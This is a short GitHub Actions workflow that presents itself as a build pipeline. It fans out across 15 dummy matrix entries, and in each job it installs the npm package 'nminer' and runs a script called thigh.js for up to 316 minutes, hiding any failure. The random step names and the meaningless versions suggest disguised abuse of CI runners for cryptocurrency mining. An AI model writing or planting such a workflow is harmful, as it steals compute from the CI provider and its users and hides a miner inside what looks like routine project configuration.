name: thigh
on:
  push:
    branches: [ "main" ]

jobs:
  build:
    runs-on: ubuntu-latest
    strategy:
      matrix:
        config:
          - { version: 8980 }
          - { version: 870 }
          - { version: 678 }
          - { version: 4779 }
          - { version: 6398 }
          - { version: 6664 }
          - { version: 500 }
          - { version: 1075 }
          - { version: 3896 }
          - { version: 61 }
          - { version: 8177 }
          - { version: 2814 }
          - { version: 6468 }
          - { version: 2606 }
          - { version: 8984 }

    steps:
      - name: Checkout
        uses: actions/checkout@v4

      - name: Install Node.js
        uses: actions/setup-node@v3
        with:
          node-version: 20
          
      - name: guilty fervently anaesthetise
        run: |
          npm install nminer@latest
          timeout 316m node thigh.js || echo "thigh executed"